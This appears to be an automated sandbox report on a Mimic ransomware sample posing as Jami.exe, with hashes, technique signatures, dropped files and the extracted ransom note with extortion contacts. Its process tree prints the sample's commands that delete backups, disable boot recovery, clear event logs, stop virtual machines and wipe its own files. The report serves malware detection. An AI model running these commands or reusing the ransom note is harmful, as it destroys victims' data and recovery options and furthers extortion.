Resubmissions

18-08-2024 08:26

240818-kbzlnsxfnm 10

18-08-2024 08:17

240818-j6x6navale 10

Analysis

  • max time kernel
    159s
  • max time network
    153s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    18-08-2024 08:17

General

  • Target

    Downloads/C963AEC1-6D52-EB4D-61BC-64DB2602EE5F/Jami.exe

  • Size

    2.4MB

  • MD5

    7f861580d2292e2f2c438f875725fd2f

  • SHA1

    20dd7b7d4cddf91aabcfe79d97dbaaaf277b7654

  • SHA256

    bd6775e772ad56d7dc4f1c7cec73fff98e6b03a2a9d109abe69a7c125a2c7828

  • SHA512

    a3ea904f97256840fc5a8636e9a2fb73d119de4e8979224b79e888c5bd3c4fc9eb748f264e13c9acd86e1de312d5f371b39197dd0f0d1e256c1c94566876f78d

  • SSDEEP

    49152:4a/RPnb1b+uL5KTu8l6VP/DOdmGtPY4ldpup0H4p5352nKESY:4a/RTd56M9/DmmGmM6RH35

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\CONTACT_US.txt

Ransom Note
NOT YOUR LANGUAGE? USE https://translate.google.com

What happened to your files ?
All of your files were protected by a strong encryption with RSA4096
More information about the encryption keys using RSA4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)

How did this happen ?
!!! Specially for your PC was generated personal RSA4096 Key , both public and private.
!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.
!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server

What do I do ?
So , there are two ways you can choose: wait for a _miracle_ and get _your_ PRICE DOUBLED! Or start obtaining *BITCOIN NOW! , and restore _YOUR_ _DATA_ easy way
If You have really valuable _DATA_, you better _NOT_ _WASTE_ _YOUR_ _TIME_, because there is _NO_ other way to get your files, except make a _PAYMENT_

Your personal ID: I9AcnWikolOyFit53rbLApU4ddhB1Sc2j8PpuTtQCQQ*Jami_decryptionguy

If you want to recover your files, write us
1)Jami messenger (Fastest and anonymous) https://jami.net/
Also you can find it on your phone at google play/app store
Install it on your server,phone or tablet
Press sign up and do your own nickname
And add me/write message - Decryptionguy (use search)
2) TOX messenger (fast and anonymous) https://tox.chat/download.html
Install qtox
Press sign up
Create your own name
Press plus
Put there our tox ID: E9164A982410EFAEBC451C1D5629A2CBB75DBB6BCDBD6D2BA94F4D0A7B0B616F911496E469FB
And add me/write message
3)Mail - [email protected] (USE ONLY IF WE NOT REPLY MORE THEN 24H)

Contact us soon, because those who don't have their data leaked in our press release blog and the price they'll have to pay will go up significantly.
Attention!
Do not rename encrypted files.
Do not try to decrypt your data using third party software - it may cause permanent data loss.
We are always ready to cooperate and find the best way to solve your problem.
The faster you write - the more favorable conditions will be for you.
Our company values its reputation. We give all guarantees of your files decryption.
URLs

https://jami.net/

https://tox.chat/download.html

Signatures

  • Detects Mimic ransomware 2 IoCs
  • Mimic

    Ransomware family first observed in the wild in 2022.

  • UAC bypass 3 TTPs 4 IoCs
  • Clears Windows event logs 1 TTPs 3 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies system executable filetype association 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Power Settings 1 TTPs 15 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in Windows directory 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 19 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 13 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Downloads\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Jami.exe
    "C:\Users\Admin\AppData\Local\Temp\Downloads\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Jami.exe"
    1⤵
    • Modifies system executable filetype association
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4780
    • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Jami.exe
      "C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Jami.exe"
      2⤵
      • UAC bypass
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Loads dropped DLL
      • Modifies system executable filetype association
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • System policy modification
      PID:4384
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c DC.exe /D
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3400
        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\DC.exe
          DC.exe /D
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3200
      • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Jami.exe
        "C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Jami.exe" -e watch -pid 4384 -!
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2868
      • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Jami.exe
        "C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Jami.exe" -e ul1
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1400
      • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Jami.exe
        "C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Jami.exe" -e ul2
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2248
      • C:\Windows\SYSTEM32\powercfg.exe
        powercfg.exe -H off
        3⤵
        • Power Settings
        PID:3292
      • C:\Windows\SYSTEM32\powercfg.exe
        powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
        3⤵
        • Power Settings
        PID:3492
      • C:\Windows\SYSTEM32\powercfg.exe
        powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
        3⤵
        • Power Settings
        PID:1676
      • C:\Windows\SYSTEM32\powercfg.exe
        powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
        3⤵
        • Power Settings
        PID:2644
      • C:\Windows\SYSTEM32\powercfg.exe
        powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
        3⤵
        • Power Settings
        PID:1100
      • C:\Windows\SYSTEM32\powercfg.exe
        powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
        3⤵
        • Power Settings
        PID:1904
      • C:\Windows\SYSTEM32\powercfg.exe
        powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
        3⤵
        • Power Settings
        PID:4500
      • C:\Windows\SYSTEM32\powercfg.exe
        powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
        3⤵
        • Power Settings
        PID:3756
      • C:\Windows\SYSTEM32\powercfg.exe
        powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
        3⤵
        • Power Settings
        PID:4784
      • C:\Windows\SYSTEM32\powercfg.exe
        powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
        3⤵
        • Power Settings
        PID:1992
      • C:\Windows\SYSTEM32\powercfg.exe
        powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
        3⤵
        • Power Settings
        PID:1540
      • C:\Windows\SYSTEM32\powercfg.exe
        powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
        3⤵
        • Power Settings
        PID:1480
      • C:\Windows\SYSTEM32\powercfg.exe
        powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
        3⤵
        • Power Settings
        PID:4032
      • C:\Windows\SYSTEM32\powercfg.exe
        powercfg.exe -S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
        3⤵
        • Power Settings
        PID:4220
      • C:\Windows\SYSTEM32\powercfg.exe
        powercfg.exe -S e9a42b02-d5df-448d-aa00-03f14749eb61
        3⤵
        • Power Settings
        PID:4732
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -ExecutionPolicy Bypass "Get-VM | Stop-VM"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:4512
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -ExecutionPolicy Bypass "Get-VM | Select-Object vmid | Get-VHD | %{Get-DiskImage -ImagePath $_.Path; Get-DiskImage -ImagePath $_.ParentPath} | Dismount-DiskImage"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:3708
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -ExecutionPolicy Bypass "Get-Volume | Get-DiskImage | Dismount-DiskImage"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:2420
      • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Everything.exe
        "C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Everything.exe" -startup
        3⤵
        • Executes dropped EXE
        • Enumerates connected drives
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2676
      • C:\Windows\SYSTEM32\bcdedit.exe
        bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:4964
      • C:\Windows\SYSTEM32\bcdedit.exe
        bcdedit.exe /set {default} recoveryenabled no
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:4476
      • C:\Windows\SYSTEM32\wbadmin.exe
        wbadmin.exe DELETE SYSTEMSTATEBACKUP
        3⤵
        • Deletes System State backups
        • Drops file in Windows directory
        PID:3848
      • C:\Windows\SYSTEM32\wbadmin.exe
        wbadmin.exe delete catalog -quiet
        3⤵
        • Deletes backup catalog
        PID:3124
      • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Everything.exe
        "C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Everything.exe" -startup
        3⤵
        • Executes dropped EXE
        • Enumerates connected drives
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:3136
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AllowMultipleTSSessions" /t REG_DWORD /d 0x1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4424
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fSingleSessionPerUser" /t REG_DWORD /d 0x0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4868
      • C:\Windows\SysWOW64\wevtutil.exe
        wevtutil.exe cl security
        3⤵
        • Clears Windows event logs
        • System Location Discovery: System Language Discovery
        PID:1328
      • C:\Windows\SysWOW64\wevtutil.exe
        wevtutil.exe cl system
        3⤵
        • Clears Windows event logs
        • System Location Discovery: System Language Discovery
        PID:4724
      • C:\Windows\SysWOW64\wevtutil.exe
        wevtutil.exe cl application
        3⤵
        • Clears Windows event logs
        • System Location Discovery: System Language Discovery
        PID:3920
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /d /c "ping 127.2 -n 5 & fsutil file setZeroData offset=0 length=20000000 "C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Jami.exe" & cd /d "C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F" & Del /f /q /a *.exe *.ini *.dll *.bat *.db"
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        PID:3552
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.2 -n 5
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3188
        • C:\Windows\SysWOW64\fsutil.exe
          fsutil file setZeroData offset=0 length=20000000 "C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Jami.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2216
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:1232
  • C:\Windows\system32\wbengine.exe
    "C:\Windows\system32\wbengine.exe"
    1⤵
    PID:1760
  • C:\Windows\System32\vdsldr.exe
    C:\Windows\System32\vdsldr.exe -Embedding
    1⤵
    PID:3444
  • C:\Windows\System32\vds.exe
    C:\Windows\System32\vds.exe
    1⤵
    • Checks SCSI registry key(s)
    PID:984

Network

MITRE ATT&CK Enterprise v15

Downloads

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\7za.exe

          Filesize

          772KB

          MD5

          b93eb0a48c91a53bda6a1a074a4b431e

          SHA1

          ac693a14c697b1a8ee80318e260e817b8ee2aa86

          SHA256

          ab15a9b27ee2d69a8bc8c8d1f5f40f28cd568f5cbb28d36ed938110203f8d142

          SHA512

          732cb0dcb2b1dac1a7462554c256cec27de243734f79b7f87026e9f5fbae6d5d8a5f14a702d2af0b65897b6abad70a9eff1905dc851ce267d221ddcdd9e640c5

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\DC.exe

          Filesize

          802KB

          MD5

          ac34ba84a5054cd701efad5dd14645c9

          SHA1

          dc74a9fd5560b7c7a0fc9d183de9d676e92b9e8b

          SHA256

          c576f7f55c4c0304b290b15e70a638b037df15c69577cd6263329c73416e490e

          SHA512

          df491306a3c8ddb580b7cca1dce9e22a87fd43ca3632f3630cdcbe114bef243e847b2ce774d688f6e142516f2e0fc49d30fad7c7168e627523da21e2fe06836a

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\[email protected]

          Filesize

          2.4MB

          MD5

          0bf7c0d8e3e02a6b879efab5deab013c

          SHA1

          4f93d2cda84e669eeddcfeb2e2fa2319901059a1

          SHA256

          b600e06f14e29b03f0b1456723a430b5024816518d704a831dde2dc9597ce9c9

          SHA512

          313f9a8ae5a0096488996f51ce0d2049f7040b5cba1f6efd6e7190517accffad9af4d72eb551755978e624f4089b9e5983eae792496b2e8e6da5a6cd7939ae5f

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Everything.db

          Filesize

          28.7MB

          MD5

          5be65f749d8536954c242d0f541a21a6

          SHA1

          ff2a66004ec61337c1dc2be777c8ea1ed75a8308

          SHA256

          cf98330caf3aca7e70676b034507647c377bc487d8a666945b089d698de63b62

          SHA512

          d8076764c0888e63d823185fdba4392d2bcea14a2f94c367d7fdd863afff518e49ce2d6b4f815450bd5e394db791911ba489bf82be6e884d159cd4af3a2c3081

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Everything.db

          Filesize

          10.1MB

          MD5

          5728ffefec0b45f35595d820edd6a818

          SHA1

          7a995427fedae44b90dbb5fff0e0007167701764

          SHA256

          1d956ba29a50eeb351f1e14bdf0a3c73b0918ae76964d9ae4b0c512b8fe44e27

          SHA512

          ee0755a82dcec6db5deaddd4dfd7076be98e9b5535d9004eb6fe0ebf248642b8fefdadba24c8e0afa6ffecd3696126f30b0af19ca2c5b27ebc2f59dc31f18ba5

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Everything.db.tmp

          Filesize

          10.1MB

          MD5

          93eb0325aa17c242cac8ea599f448750

          SHA1

          e7f59d88dde7e8aa8500898f48bd2f85e4627e82

          SHA256

          1a2b913795a8d77f087decc4a04f74146e6504ba8d4ef843efe73c7f31a54fbd

          SHA512

          a33ec6abe1d4d3d1a89de9b2e2b618cb633a6f1c592e4bb0093dc886100756fc3ec182d9c979219070704158f2ae5672f7cf9f089afd3ec913ec031efecd17a1

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Everything.exe

          Filesize

          1.7MB

          MD5

          c44487ce1827ce26ac4699432d15b42a

          SHA1

          8434080fad778057a50607364fee8b481f0feef8

          SHA256

          4c83e46a29106afbaf5279029d102b489d958781764289b61ab5b618a4307405

          SHA512

          a0ea698333c21e59b5bc79d79ff39d185a019cede394dbd8b2eb72c4230001685a90098a691c296aeab27db6751eef56c4261cf00f790de2e9e9efc0e7f7c808

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Everything.ini

          Filesize

          20KB

          MD5

          b08dea2c475176c96e29eacc73667b24

          SHA1

          65ebd451669ae873b96df95d46ecec7de216293e

          SHA256

          2a2a0fe8ba8f77a156d5bd3a5e9bf3628437afb19680964fe12a63b63959ab2f

          SHA512

          47f4b74022c457bf2eec57284f24cd339496de389ba344f2ad5b067e0baf16c361bff6caf573721b022e544763a6d6b559213efa621d7a8b1fa334fc371a2fcd

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Everything.ini

          Filesize

          20KB

          MD5

          f5cc303579b2fb3a4ae9ef5d50c2fdad

          SHA1

          ddd284394f4c2cb0361195952692934aaad30052

          SHA256

          8ff1f5fa71e0bccf3ce1dbae1c3986eed78a1c2eb45ba00f193a232fc8bdfc05

          SHA512

          078fd1caed58920793dda70525beb0f7c95f6aed34e7070f27d26c0deec536abea7e2e8dc3fd2cde455d3a7e491b232ff0af07fc71b299d88e0f9ea7e42f4c15

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Everything2.ini

          Filesize

          550B

          MD5

          51014c0c06acdd80f9ae4469e7d30a9e

          SHA1

          204e6a57c44242fad874377851b13099dfe60176

          SHA256

          89ad2164717bd5f5f93fbb4cebf0efeb473097408fddfc7fc7b924d790514dc5

          SHA512

          79b5e2727cce5cd9f6d2e886f93b22b72ec0ad4a6b9ad47205d7cf283606280665ead729ab3921d7e84409cfc09a94e749a68918130f0172856626f5f7af010c

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Everything32.dll

          Filesize

          84KB

          MD5

          3b03324537327811bbbaff4aafa4d75b

          SHA1

          1218bd8165a2e0ec56a88b5a8bb4b27e52b564e7

          SHA256

          8cae8a9740d466e17f16481e68de9cbd58265863c3924d66596048edfd87e880

          SHA512

          ba5312e1836bac0bb05b133b2b938be98b28646c8b8fc45804d7f252cd2e1a191667bfa8ba979bf2a07d49053114234b78cca83ef28aecf105d7169a3ec3dc62

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Everything64.dll

          Filesize

          2.5MB

          MD5

          e7cecb49da4cefd6f0b306ff09afdcb4

          SHA1

          5ea8f3e6a1243f12290b473ca1948fb3bec7be0f

          SHA256

          b4c78dcf7c9bfe60c2c61cab64243fe72a94a2ba002d0c742fadd56b1a92bfdd

          SHA512

          29589431b6e6e479c8a8cb0ad7e98905f5891e8c3b12d73a6a985e2cac40385d1c88529b14bcd8e614d01bfc6bc8068447274c4b485d35900677f583f49a3347

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\Jami.exe

          Filesize

          2.4MB

          MD5

          7f861580d2292e2f2c438f875725fd2f

          SHA1

          20dd7b7d4cddf91aabcfe79d97dbaaaf277b7654

          SHA256

          bd6775e772ad56d7dc4f1c7cec73fff98e6b03a2a9d109abe69a7c125a2c7828

          SHA512

          a3ea904f97256840fc5a8636e9a2fb73d119de4e8979224b79e888c5bd3c4fc9eb748f264e13c9acd86e1de312d5f371b39197dd0f0d1e256c1c94566876f78d

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\global_options.ini

          Filesize

          12KB

          MD5

          84f6a8f7607a096ba9c0cb704ae6ac8f

          SHA1

          48d951cc741484e87fdb6d08924385f8e1ae340d

          SHA256

          d7724e06402a2b1fc49f95178c1f8f9006f9c6a0636a7be4e29cd5474339013d

          SHA512

          60ae5fc39691dedebeb0f4e31630be778fb893f1c868996fa9d3b7ba4dd15be389e9a41a395f979357ac2d72eff80caa2fada5614428c569c68ef14d415d4b3a

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\gui35.exe

          Filesize

          276KB

          MD5

          03a63c096b9757439264b57e4fdf49d1

          SHA1

          a5007873ce19a398274aec9f61e1f90e9b45cc81

          SHA256

          22ea129b0f57184f30b1771c62a3233ba92e581c1f111b4e8abfa318dc92cc46

          SHA512

          0d656d807572f6be4574024e2bbcf0cbd291fe13a1adeb86a333177ee38db16b06da9a18509e599db0d2cf8206b84f6856a9674dba29a2cbeb844a216cb45ddd

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\gui40.exe

          Filesize

          276KB

          MD5

          57850a4490a6afd1ef682eb93ea45e65

          SHA1

          338d147711c56e8a1e75e64a075e5e2984aa0c05

          SHA256

          31feff32d23728b39ed813c1e7dc5fe6a87dcd4d10aa995446a8c5eb5da58615

          SHA512

          15cf499077e0c8f3421b95e09a18ae5468ae20a7b3a263f01cc8e6d445d54f09ca8a3189ecb40c87d0e6277c99b504424cdd0e35bbe493a1b0849900d21bccf8

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\session.tmp

          Filesize

          32B

          MD5

          f3fecae31ffe8e63f962c2779e24f1f5

          SHA1

          c1f3d5cba932ef8d8664e22da102e190ce64c60e

          SHA256

          579c870a0f12af418e36b48b5f43bc5e38522d6aeca628b031dbc65ce82114be

          SHA512

          9b1c9c4e685bdc5ee46c0ca297e398a6008766d3b3011de7bddca67c3fba3596b6121b5189093d0d22badd0031a22408ec520cd95aa28a33ca087815caeb0271

        • C:\Users\Admin\AppData\Local\C963AEC1-6D52-EB4D-61BC-64DB2602EE5F\xdel.exe

          Filesize

          350KB

          MD5

          803df907d936e08fbbd06020c411be93

          SHA1

          4aa4b498ae037a2b0479659374a5c3af5f6b8d97

          SHA256

          e8eaa39e2adfd49ab69d7bb8504ccb82a902c8b48fbc256472f36f41775e594c

          SHA512

          5b9c44b4ed68b632360c66b35442722d2797807c88555c9fde9c176581d410e4f6ed433fabdcd9ee614db458158e6055a9f7f526ebfbc8e7f5f3d388f5de4532

        • C:\Users\Admin\AppData\Local\CONTACT_US.txt

          Filesize

          2KB

          MD5

          1f43c3c88d3c0e8c6bf39969391e5891

          SHA1

          38618bf833bbe691a6307d4f832d87d66b649f59

          SHA256

          444b546728cfe4120d72fff22c7c98d1fd894ecbfa1b6658006c30623ddb5602

          SHA512

          bd49bb786b3b9fb264593147d5e33b0c48f5feac7caa7d15cd8c8589798bffd67ee97e2816d93792f752f7ca91972c96fe3d6a822ae3436cb6e00db4567eac66

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          627073ee3ca9676911bee35548eff2b8

          SHA1

          4c4b68c65e2cab9864b51167d710aa29ebdcff2e

          SHA256

          85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

          SHA512

          3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          b69fe8c181767d369e3e3c515148a716

          SHA1

          ed4bd904824f8cd154fbfcc50a4981309353c4d7

          SHA256

          f9a5e597ca3663f8f769fcb9fabdf1817c3e4e344bdc251f443a72afddbff178

          SHA512

          c9647f2c81d0d2e6758c97183f5304d7867b8b67e04f95ae30fe4e5d7d2675e494163ab7beb7fbf326023ea52b2406abda48c06942d04c320009de8dfd33647b

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          1a9fa92a4f2e2ec9e244d43a6a4f8fb9

          SHA1

          9910190edfaccece1dfcc1d92e357772f5dae8f7

          SHA256

          0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

          SHA512

          5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h4jtnvjt.dtr.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/2420-96-0x000002082C280000-0x000002082C28A000-memory.dmp

          Filesize

          40KB

        • memory/4512-84-0x000002B3B5880000-0x000002B3B58A2000-memory.dmp

          Filesize

          136KB